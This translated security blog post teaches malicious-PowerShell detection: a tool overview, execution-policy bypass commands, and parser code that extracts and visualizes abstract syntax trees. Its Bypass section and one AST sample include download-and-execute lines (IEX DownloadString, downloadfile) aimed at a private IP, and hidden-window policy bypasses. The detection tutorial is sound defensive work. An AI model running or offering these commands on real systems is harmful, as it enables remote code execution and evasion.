[System Security] Part 43. PowerShell Malicious Code Detection Series: Automatic Abstract Syntax Tree Extraction, Explained in Detail

Posted 2022-07-04 Eastmount


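A brief commemoration: my CSDN view count is about to pass ten million, and I have nearly 300,000 followers across all platforms. Ten years and nearly 700 articles. I can honestly say this is my youth from age 20 to 30. It holds technical posts as well as the story of the Na-Zhang-Luo family (娜璋珞) and our love story, and it has watched a student raised in the mountains of Guizhou slowly grow up while getting to know a great many fellow bloggers. Take Teacher Su, shown in Figure 7: after many setbacks he finished his PhD, returned to his hometown of Yulin to become a university teacher, and has now built a chemistry laboratory at his own expense, simply to pass on what he has learned to his students. Over these ten years I have met many such bloggers, teachers, and experts on CSDN. We have never met and live far apart, yet we encourage one another. As the poem goes, moss flowers are as small as grains of rice, yet they too learn to bloom like peonies.

Finally, thanks to CSDN, which has let me wheedle quite a few gifts over the years, and even more thanks to everyone who has read the Na-Zhang stories and liked my technical posts. I hope you will remember a sharer named Eastmount: not an expert, not a big name, just someone who quietly writes technical blog posts out of love for it (I have written very little this year because I have been so busy). I will keep writing on CSDN for another twenty years, thirty years, a lifetime, and will keep recording our family's story. I would love to continue that story now, but I am far too busy; I will write properly after I graduate.

I really want to graduate soon and go back home to Guizhou to keep teaching. There are so many posts to share, courses to teach, code to open-source, and things to learn, and I look forward to the day I stand at the lectern again. As my entry for this event, my "life goes on, writing never stops" story with CSDN is in the article below. Being so busy, I will keep this short; after the next decade we can look back on these twenty years in detail. I will settle down and keep studying: not talented but diligent, and grateful for everyone I have met. Keep going, and good night, Na!

My Ten Years with CSDN: Writing Without Pause, Youth and Passion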

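You may have seen similar articles of mine before, so why write them again? I simply want to help beginners understand virus reverse analysis and system security in a more systematic way, without disturbing the earlier series. I therefore opened this new column to organize and study system security, reverse analysis, and malicious code detection in depth. The "System Security" series will be more focused, more systematic, and deeper, and it also records my own gradual growth. Changing fields is hard and reverse analysis is a tough nut to crack, but I will give it a try and see how far I can take it over the next four years. The road is long, and I am heading for the tiger's mountain anyway. Enjoy the process, and let's keep going together.

The previous article briefly introduced PowerShell, summarized research on PowerShell malicious code detection, and covered abstract syntax tree (AST) extraction, mainly from the perspective of the papers. This article explains in detail how to extract the AST through the officially provided interface, including AST visualization and node extraction. I hope it helps, and I also recommend reading the papers themselves.

I hope these fundamentals help you defend and protect systems better. I am a beginner in network security sharing self-study tutorials, mostly in the form of online notes, and I hope you like them. Even more, I hope you will work through the material and improve along with me; later articles will go deeper into network and system security and share the related experiments. Writing takes effort, so experts, please be kind. If the article helps you, that is my greatest motivation; likes, comments, and private messages are all welcome.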

The author's GitHub resources:

Reverse analysis: https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
Network security: https://github.com/eastmountyxz/NetworkSecuritySelf-study

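In July 2019 I moved into an unfamiliar field: cyberspace security. Entering the security field was painful at first, with too much to learn across too wide an area, but I pushed forward by sharing the 100 articles of the "Network Security Self-Study" series. I am grateful to the security experts and friends I have come to know over this year. Where the writing falls short, please bear with me.

Next I am starting a new security series called "System Security", again 100 free articles. It will go deeper into malware sample analysis, reverse analysis, intranet penetration, and hands-on network attack and defense, shared as online notes and practical exercises. I hope to improve together with you.

Recommended earlier series: Network Security Self-Study, 100 articles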


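Disclaimer: I firmly oppose using these teaching methods to commit crimes. All criminal acts will be severely punished. A clean network needs all of us to maintain it, and I encourage readers to understand the principles behind these techniques so they can defend against them better.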

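I. PowerShell Overview

1. High Threat

In recent years PowerShell has been widely used in APT attacks because it is easy to use and highly stealthy. Traditional malicious code detection techniques based on manual feature extraction and machine learning are becoming less and less effective against malicious PowerShell code.

Microsoft PowerShell is a command-line shell and scripting language installed by default on Windows machines. It is built on Microsoft's .NET framework and includes an interface that lets programmers access operating system services. Although administrators can configure PowerShell to restrict access and reduce vulnerabilities, these restrictions can be bypassed. In addition, PowerShell commands can easily be generated dynamically, executed from memory, encoded, and obfuscated, which makes logging and forensic analysis of code executed by PowerShell challenging.

For these reasons, cybercriminals increasingly use PowerShell as part of their attack toolchain, mainly to download malicious content and to move laterally. A comprehensive Symantec technical report on the abuse of PowerShell by cybercriminals stated that the number of malicious PowerShell samples they received, and the number of penetration tools and frameworks that use PowerShell, had increased sharply. This highlights the urgent need for effective methods of detecting malicious PowerShell commands.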

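2. Basic Syntax

PowerShell is also a part of penetration testing that cannot be ignored, and it is still being updated and developed. It is flexible and offers functional management of Windows systems. Once an attacker can run code on a machine, they can download a PowerShell script file (.ps1) to disk and execute it, or skip the disk entirely and run it directly in memory.

These characteristics make PowerShell a preferred means for attackers to gain and keep access to a system. By exploiting them, an attacker can sustain an attack without being easily discovered. Commonly used PowerShell attack tools include the following.

PowerSploit
A widely used PowerShell post-exploitation framework, commonly used for information gathering, privilege escalation, credential theft, and persistence.
Nishang
A PowerShell-based tool built for penetration testing. It bundles frameworks, scripts, and various payloads, including scripts for download-and-execute, keylogging, DNS, and delayed commands.
Empire
A PowerShell-based remote access trojan that can export and track credentials from credential databases. It is commonly used for its integrated exploitation modules, information gathering, credential theft, and persistent control.
PowerCat
The PowerShell version of NetCat, known as the "Swiss Army knife" of network tools. It reads and writes data across the network over TCP and UDP. Combined with other tools and redirection, it can be used in scripts in many ways.

In PowerShell, the counterparts of cmd commands are called cmdlets. Their naming is very consistent: all follow a "Verb-Noun" form such as New-Item, where the verb is typically Add, New, Get, Remove, Set, and so on. Aliases are generally compatible with Windows Command and Linux shell names, so Get-ChildItem can be invoked as dir or ls. PowerShell commands are also case-insensitive.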
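The naming convention and aliases described above can be checked with built-in cmdlets. This is only a small sketch: it uses the alias gci because, as far as I know, it is defined on every platform, whereas other aliases such as ls depend on the operating system and PowerShell version.

```powershell
# Resolve an alias to the cmdlet it stands for.
$target = (Get-Alias -Name gci).Definition
$target

# Command names are case-insensitive: both spellings resolve to the same cmdlet.
$lower = (Get-Command -Name get-childitem).Name
$upper = (Get-Command -Name GET-CHILDITEM).Name
$lower -eq $upper

# List the cmdlets that share one noun to see the Verb-Noun pattern.
Get-Command -Noun Content -CommandType Cmdlet | Select-Object -ExpandProperty Name
```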

The following file operations illustrate basic PowerShell command usage.

Create a directory: New-Item whitecellclub -ItemType Directory
Create a file: New-Item light.txt -ItemType File
Delete a directory: Remove-Item whitecellclub
Show file contents: Get-Content test.txt
Set file contents: Set-Content test.txt -Value "hello,world!"
Append contents: Add-Content light.txt -Value "i love you"
Clear contents: Clear-Content test.txt

A simple example:

New-Item test -ItemType directory
Remove-Item test
New-Item eastmount.txt -ItemType file -value "hello csdn"  

Get-Content eastmount.txt
Add-Content eastmount.txt -Value " bye!"
Get-Content eastmount.txt 

Set-Content eastmount.txt -Value "haha"
Get-Content eastmount.txt
Clear-Content eastmount.txt
Get-Content eastmount.txt
Remove-Item eastmount.txt
Get-Content eastmount.txt

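3. Bypass

In testing, a downloaded PowerShell script launched from a cmd window ran directly regardless of the current policy. To run a script from inside a PowerShell window, however, administrator rights are needed to change the Restricted policy to Unrestricted. During a penetration test, therefore, some method of bypassing the policy is needed to execute scripts.

(1) Download a remote PowerShell script and run it, bypassing the policy
Call the DownloadString function to download the remote ps1 script file.

// run the following command in a cmd window
powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

// run this in a PowerShell window
IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

The figure below, borrowed from 谢公子, shows the command being run after switching to a CMD window.

(2) Bypass the policy for a local script
Upload xxx.ps1 to the target server and, from a CMD environment, execute the script locally on the target server as follows.

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

powershell -exec bypass  .\test.ps1

(3) Bypass the policy locally with a hidden window

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo
-NonInteractive -NoProfile -File xxx.ps1

For example:

powershell.exe -exec bypass -W hidden -nop test.ps1

(4) Use IEX to download a remote PS1 script and run it, bypassing the policy

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
-NonI IEX(New-Object Net.WebClient).DownloadString("xxx.ps1");[Parameters]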

Function definition:

function Test-MrParameter {

    param (
        [string]$ComputerName
    )

    Write-Output $ComputerName
    Write-Output ($ComputerName+$ComputerName)
    Write-Output ($ComputerName+$ComputerName+$ComputerName)
}

Inspecting and calling the function:

Get-Command -Name Test-MrParameter -Syntax
Test-MrParameter -ComputerName 'this is a computer name'
pause

Output:

Test-MrParameter [[-ComputerName] <Object>]

this is a computer name
Press Enter to continue...:

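II. powershell.one

A PowerShell abstract syntax tree expresses the semantics of code as a multi-way tree that represents the logical structure of what a script does. It preserves the contextual features of the code while removing interference from irrelevant parameters, which makes it an effective way to analyze PowerShell code with similar functionality. An AST is usually obtained either through an existing interface or with a custom program. The previous article introduced the first approach below; this article introduces the officially provided interface.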

Deobshell
https://github.com/thewhiteninja/deobshell
powershell.one => Convert-CodeToAst
https://powershell.one/powershell-internals/parsing-and-tokenization/abstract-syntax-tree#ast-object-inheritance

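Windows provides PowerShell with an interface for accessing a script's AST. The AST structure obtained through the built-in interface is shown in the figure.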

The Abstract Syntax Tree (AST) groups tokens into meaningful structures and is the most sophisticated way of analyzing PowerShell code.

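1. Concepts

The PowerShell parser converts individual characters into meaningful keywords and distinguishes, for example, commands, parameters, and variables. This is called tokenization and was covered earlier. Editors, for instance, use these tokens to colorize code and show variables in a different color from commands.

The parser does not stop there. To execute code, PowerShell needs to know how the individual tokens form structures that can be executed. The parser takes the tokens and builds an abstract syntax tree (AST), which essentially groups tokens into meaningful structures.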
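To make the two stages concrete, here is a minimal sketch that asks the parser for both the tokens and the AST of a one-line script. It uses Parser.ParseInput from the System.Management.Automation.Language namespace; the sample code string is my own choice, and nothing is executed, only parsed.

```powershell
# ParseInput fills these two variables by reference.
$tokens = $null
$errors = $null

# Single quotes keep $a from being expanded before parsing.
$ast = [System.Management.Automation.Language.Parser]::ParseInput(
    '$a = 1', [ref]$tokens, [ref]$errors)

# Stage 1: the flat token stream (kind and text of each token).
$tokens | Select-Object Kind, Text

# Stage 2: the tokens grouped into a tree; the root is a ScriptBlockAst.
$ast.GetType().Name
```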

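The abstract syntax tree is called a tree because it works like a hierarchical tree. PowerShell starts at the first token and uses the PowerShell language definition (the grammar) to see what the next possible token could be. In this way the parser works its way through the code.

Case 1: PowerShell succeeds and creates a valid structure for the code
Case 2: PowerShell encounters and raises a syntax error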

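2. Accessing the AST

Starting with PowerShell 3, the abstract syntax tree is exposed to you, so you can analyze PowerShell code yourself and understand its internal structure. There are two main ways to access the AST:

ScriptBlock: a scriptblock is a valid block of PowerShell code, so it has already been processed by the parser, and the parser guarantees that the code contains no syntax errors. Every scriptblock has a property named Ast that exposes the abstract syntax tree of the code it contains.
Parser: you can ask the PowerShell parser to parse arbitrary code and return the tokens and the AST. In doing so you are essentially mimicking what PowerShell does when you enter and execute code. Because the parser works on raw text, there is no guarantee that the code is syntactically correct, which is why the parser also returns any syntax errors it finds.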
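The two access paths can be sketched side by side as follows. The sample code strings are my own, and the second one is deliberately incomplete so that the parser has an error to report.

```powershell
# Way 1: a scriptblock literal is already parsed; read its Ast property.
$block = { Get-Date }
$blockRoot = $block.Ast.GetType().Name
$blockRoot

# Way 2: hand raw text to the parser and collect tokens and syntax errors.
$tokens = $null
$errors = $null
$text = 'Get-Date |'     # incomplete pipeline, not valid PowerShell
$ast = [System.Management.Automation.Language.Parser]::ParseInput(
    $text, [ref]$tokens, [ref]$errors)

# The parser still returns a tree, plus a list of the problems it found.
$errors | ForEach-Object { $_.Message }
```

Because ParseInput never executes the text, this path is the safer one when the input is an untrusted sample.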

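A simple example of viewing the AST is shown in the figure below; you can inspect the abstract syntax tree (AST) that the parser built.

$code = { "Hello" * 10 }
$code.Invoke()
$code.Ast

The output is shown in the figure below:

This can be used to create a simple test function that checks whether a string is valid PowerShell code: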

function Test-PowerShellCode
{
    param
    (
        [string]
        $Code
    )

    try
    {
        # try and convert string to scriptblock:
        $null = [ScriptBlock]::Create($Code)
    }
    catch
    {
        # the parser is invoked implicitly and returns
        # syntax errors as exceptions:
        $_.Exception.InnerException.Errors
    }
}

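The abstract syntax tree (AST) is a tree of Ast objects. The top of this tree is what the parser returns to you. Every Ast object you encounter while traversing the tree has the properties Parent and Extent. Parent defines the tree relationship, and Extent defines the PowerShell code that the Ast object covers.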
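As a small illustration of Parent and Extent, the sketch below finds the innermost node of a one-line script and walks upward to the root. The sample code is my own, and it is parsed from text (not taken from a scriptblock literal) so that the root node has no parent of its own.

```powershell
$tokens = $null
$errors = $null
$ast = [System.Management.Automation.Language.Parser]::ParseInput(
    '$a = 1', [ref]$tokens, [ref]$errors)

# Start from the constant 1 ...
$node = $ast.Find(
    { param($n) $n -is [System.Management.Automation.Language.ConstantExpressionAst] },
    $true)

# ... and follow Parent until the root, whose Parent is $null.
$chain = @()
while ($null -ne $node) {
    # Extent.Text is the source text that this node covers.
    $chain += '{0}: {1}' -f $node.GetType().Name, $node.Extent.Text
    $node = $node.Parent
}
$chain
```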

Commonly used methods:

Name                   Signature
----                   ---------
Copy                   System.Management.Automation.Language.Ast Copy()
Find                   System.Management.Automation.Language.Ast Find(System.Func[System.Management.Automation.Language.Ast,bool] predicate, bool searchNestedScriptBlocks)
FindAll                System.Collections.Generic.IEnumerable[System.Management.Automation.Language.Ast] FindAll(System.Func[System.Management.Automation.Language.Ast,bool] predicate, b...
Visit                  System.Object Visit(System.Management.Automation.Language.ICustomAstVisitor astVisitor), void Visit(System.Management.Automation.Language.AstVisitor astVisitor)
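The following sketch shows how Find and FindAll from the table above might be used with a predicate. The two-line sample script is hypothetical, and GetCommandName is a method of CommandAst; nothing in the sample is executed.

```powershell
$source = @'
$dir = Get-ChildItem -Path .
Get-Content -Path notes.txt | Select-Object -First 1
'@

$tokens = $null
$errors = $null
$ast = [System.Management.Automation.Language.Parser]::ParseInput(
    $source, [ref]$tokens, [ref]$errors)

# Predicate: keep only command invocations.
$isCommand = { param($node) $node -is [System.Management.Automation.Language.CommandAst] }

# Find returns the first match; FindAll returns every match.
# The second argument ($true) also searches nested scriptblocks.
$first = $ast.Find($isCommand, $true)
$all   = $ast.FindAll($isCommand, $true)

$first.GetCommandName()
$names = @($all | ForEach-Object { $_.GetCommandName() })
$names
```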

III. Visualizing the Abstract Syntax Tree

1. Official Example

It may be helpful to add the Ast object relationships to the output, and visualize the tree, and how the objects are nested. That’s why I created Convert-CodeToAst that takes any simple (or complex) PowerShell code (scriptblock) and outputs the object hierarchy and involved types:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]
    [ScriptBlock]
    $Code
  )

  # build a hashtable for parents
  $hierarchy = @{}

  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = $_.Parent.GetHashCode()
    if ($hierarchy.ContainsKey($id) -eq $false)
    {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    # add ast object to parent
    $null = $hierarchy[$id].Add($_)
  }

  # visualize tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  {
    # use this as indent per level:
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output current ast object with appropriate
      # indentation:
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent

      # take id of current ast object
      $newid = $_.GetHashCode()
      # recursively look at its children (if any):
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # start visualization with ast root object:
  Visualize-Tree -id $code.Ast.GetHashCode()
}

Call it like this:

Convert-CodeToAst -Code {
  # place your test code here (make it as simple as you can):
  $a = 1
}

Output:

[NamedBlockAst]: $a = 1
--[AssignmentStatementAst]: $a = 1
----[VariableExpressionAst]: $a
----[CommandExpressionAst]: 1
------[ConstantExpressionAst]: 1

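If PowerShell reports that running scripts is disabled on this system, as shown in the figure below, a simple setting fixes it:

Set-ExecutionPolicy RemoteSigned

I also recommend editing PowerShell code in VS Code.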

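2. Extracting the AST of a Code Block

The code for extracting the abstract syntax tree is given below. It is fairly simple and can be studied directly.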

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # mandatory parameter
    [ScriptBlock]
    $Code
  )

  # build a hashtable for parents
  $hierarchy = @{}

  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = $_.Parent.GetHashCode()
    if ($hierarchy.ContainsKey($id) -eq $false)
    {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    # add ast object to parent
    $null = $hierarchy[$id].Add($_)
  }

  # visualize tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  {
    # use this as indent per level:
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output current ast object with appropriate
      # indentation:
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent

      # take id of current ast object
      $newid = $_.GetHashCode()
      # recursively look at its children (if any):
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # start visualization with ast root object:
  Visualize-Tree -id $code.Ast.GetHashCode()
}

Convert-CodeToAst -Code { $a = 1 }

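The output is shown in the figure below:

3. Extracting the AST of a Given PS File

Here is the extraction code for a specified PowerShell script file.

The complete code with detailed comments is as follows: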

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # mandatory parameter
    [System.String]$str      # path of the .ps1 file to parse
  )

  # build the hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # read the contents of the .ps1 file
  Write-Output ("file name: {0}" -f ($str))
  # -Raw returns the file as one string, so line breaks survive
  $content = Get-Content -Path $str -Raw
  Write-Output $content

  # create the script block
  $code = [ScriptBlock]::Create($content)

  # extract the AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key; the root has no parent, so it gets key 0
    $id = 0
    if ($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug ('{0}:{1}' -f $_.GetType().Name, $id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    # add ast object to parent
    $null = $hierarchy[$id].Add($_)
  }

  # visualize the tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  {
    # indent per level
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output the AST object
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent

      # take the id of the current AST object
      $newid = $_.GetHashCode()
      # recurse into its children (if any)
      if ($hierarchy.ContainsKey($newid)) {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # start visualization with the AST root object
  Visualize-Tree -id $code.Ast.GetHashCode()
  return $result
}

Convert-CodeToAst -str .\data\example-001.ps1

The output is shown in the figure below:

Suppose a file named "example-002.ps1" exists.

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');

The corresponding AST is as follows:

PS D:\powershell> .\get_ast_002.ps1
file name: .\data\example-002.ps1
powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');
[NamedBlockAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
--[PipelineAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
----[CommandAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
------[StringConstantExpressionAst]: powershell
------[InvokeMemberExpressionAst]: (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
--------[ParenExpressionAst]: (new-object system.net.webclient)
----------[PipelineAst]: new-object system.net.webclient
------------[CommandAst]: new-object system.net.webclient
--------------[StringConstantExpressionAst]: new-object
--------------[StringConstantExpressionAst]: system.net.webclient
--------[StringConstantExpressionAst]: downloadfile
--------[StringConstantExpressionAst]: 'http://192.168.10.11/test.exe'
--------[StringConstantExpressionAst]: 'test.exe'
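One way such a tree can feed a detector is as a count of node types. The sketch below is my own illustration, not code from the original post: it parses the same one-line sample as text (without running it) and tallies the node types with Group-Object.

```powershell
$source = "powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');"

$tokens = $null
$errors = $null
$ast = [System.Management.Automation.Language.Parser]::ParseInput(
    $source, [ref]$tokens, [ref]$errors)

# Count how often each AST node type occurs in the script.
$histogram = $ast.FindAll({ $true }, $true) |
    ForEach-Object { $_.GetType().Name } |
    Group-Object |
    Sort-Object -Property Count -Descending

$histogram | Select-Object Name, Count
```

A vector of these counts is a simple structural feature; it ignores the concrete URL and file name while keeping the shape of the command.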

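So what if I only want to extract the nodes?

IV. Extracting Abstract Syntax Tree Nodes

1. Extracting AST Nodes

AST nodes are extracted with a post-order traversal. The code is as follows: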

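function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # mandatory parameter
    [System.String]$str      # path of the .ps1 file to parse
  )

  # build the hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # read the contents of the .ps1 file
  Write-Output ("file name: {0}" -f ($str))
  $content = Get-Content -Path $str -Raw
  Write-Output $content

  # create the script block from the file contents (not from the file name)
  $code = [ScriptBlock]::Create($content)

  # extract the AST
  # (the rest of this listing is cut off in the source)
}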
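Since the listing above breaks off before the traversal itself, here is a minimal sketch of what a post-order extraction of node types could look like. It is my own reconstruction of the idea, not the author's code: the function name Get-AstPostOrder and the helper Visit-Node are hypothetical, and the sketch takes an already parsed Ast object as input.

```powershell
function Get-AstPostOrder {
    param(
        [Parameter(Mandatory)]
        [System.Management.Automation.Language.Ast]$Root
    )

    # Group every node under its parent; keys are the parent objects themselves.
    $children = @{}
    foreach ($node in $Root.FindAll({ $true }, $true)) {
        $parent = $node.Parent
        if ($null -eq $parent) { continue }
        if (-not $children.ContainsKey($parent)) {
            $children[$parent] = [System.Collections.ArrayList]@()
        }
        $null = $children[$parent].Add($node)
    }

    # Post-order: emit all children first, then the node itself.
    function Visit-Node($Node) {
        if ($children.ContainsKey($Node)) {
            foreach ($child in $children[$Node]) { Visit-Node $child }
        }
        $Node.GetType().Name
    }

    Visit-Node $Root
}

# Usage: parse a one-line sample (nothing is executed) and list its node types.
$tokens = $null
$errors = $null
$ast = [System.Management.Automation.Language.Parser]::ParseInput(
    '$a = 1', [ref]$tokens, [ref]$errors)
$order = @(Get-AstPostOrder -Root $ast)
$order -join ' '
```

In this order the leaves come first and the root ScriptBlockAst comes last, so the node sequence reflects how inner expressions combine into larger statements.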